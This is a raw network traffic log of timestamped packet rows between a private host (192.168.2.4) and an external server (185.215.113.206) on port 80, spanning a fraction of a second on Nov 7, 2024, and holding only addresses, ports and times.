Nov 7, 2024 04:12:04.080241919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080265045 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080293894 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080295086 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080307961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080322981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080341101 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080374956 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080379009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080427885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080427885 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080442905 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080466986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080471039 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080481052 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080497026 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080498934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080511093 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080519915 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080527067 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080564022 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080571890 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080585003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080589056 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080598116 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080615997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080622911 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080631018 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080645084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.080647945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080697060 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.080996037 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081007004 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081020117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081056118 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.081068039 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.081753969 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081769943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081784964 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081810951 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.081840992 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081841946 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.081856966 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081871986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081886053 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.081888914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081918955 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.081950903 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.081976891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.081990004 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082004070 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082017899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082025051 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082031012 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082046986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082061052 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082071066 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082076073 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082094908 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082098007 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082114935 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082138062 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082274914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082289934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082303047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082312107 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082324982 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082333088 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082340002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082355022 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082360983 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082370043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082384109 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082392931 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082396984 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082415104 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082417965 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082429886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082439899 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082444906 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082467079 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082480907 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082483053 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082495928 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082509995 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082519054 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082524061 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082540035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082545042 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082556009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.082585096 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082586050 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.082613945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083169937 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083194017 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083209991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083230972 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083231926 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083249092 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083256960 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083261967 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083276987 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083308935 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083331108 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083360910 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083375931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083389044 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083401918 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083406925 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083416939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083431005 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083436966 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083446026 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083467960 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083477020 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083491087 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083499908 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083503962 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083518982 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083525896 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083542109 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.083564043 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.083590031 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.230791092 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.230822086 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.230837107 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.230865002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.230984926 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.230984926 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231165886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231206894 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231218100 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231221914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231254101 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231271029 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231276035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231291056 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231303930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231328011 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231328964 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231343985 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231352091 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231373072 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231399059 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231408119 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231421947 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231431007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231445074 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231460094 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231466055 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231484890 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231512070 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231539011 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231556892 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231570959 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231578112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231585979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231611967 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231631041 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231652021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231663942 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231677055 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231689930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231697083 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231705904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231725931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231729984 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231745005 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231748104 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231769085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231771946 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231781960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231792927 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231796980 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231812954 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231822014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231827974 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231842995 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231848955 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231873989 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231887102 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231894970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231899023 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231915951 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231930017 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231935024 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231950998 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231957912 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231973886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.231985092 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.231988907 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232006073 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232011080 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232023001 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232033014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232043028 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232053041 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232057095 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232072115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232080936 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232088089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232096910 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232109070 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232127905 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232137918 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232162952 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232171059 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232178926 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232193947 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232203007 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232207060 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232227087 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232233047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232247114 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232256889 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232259035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232274055 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232279062 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232286930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232300043 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232301950 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232316971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232330084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232331038 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232345104 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232347965 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232381105 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232381105 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232395887 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232412100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232414961 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232428074 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232443094 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232454062 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232502937 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232516050 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232530117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232543945 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232558012 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232558012 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232575893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232585907 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232590914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232605934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232611895 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232621908 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232645988 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232659101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232671976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232675076 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232686996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232700109 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232709885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232723951 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232728004 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232749939 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232793093 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232808113 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232817888 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232821941 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232836962 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232851982 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232857943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232873917 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232892036 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232894897 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232914925 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232918024 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232933998 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232947111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232949972 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232961893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.232978106 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.232992887 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233006954 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233010054 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233021975 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233031034 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233035088 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233051062 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233067989 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233071089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233086109 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233103991 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233108997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233124018 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233130932 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233138084 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233153105 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233158112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233166933 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233186007 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233230114 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233283997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233329058 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233403921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233418941 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233432055 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233449936 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233453989 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233468056 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233475924 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233481884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233499050 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233505964 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233511925 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233526945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233527899 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233566999 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233573914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233587980 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233596087 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233608007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233623028 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233629942 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233639956 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233656883 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233668089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233671904 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233697891 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233721018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233730078 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233746052 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233761072 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233778000 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233778000 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233793974 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233800888 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233840942 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.233932972 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233946085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233959913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233973026 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.233978033 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234000921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234016895 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234030008 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234046936 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.234061003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.234076023 CET	49730	80	192.168.2.4	185.215.113.206
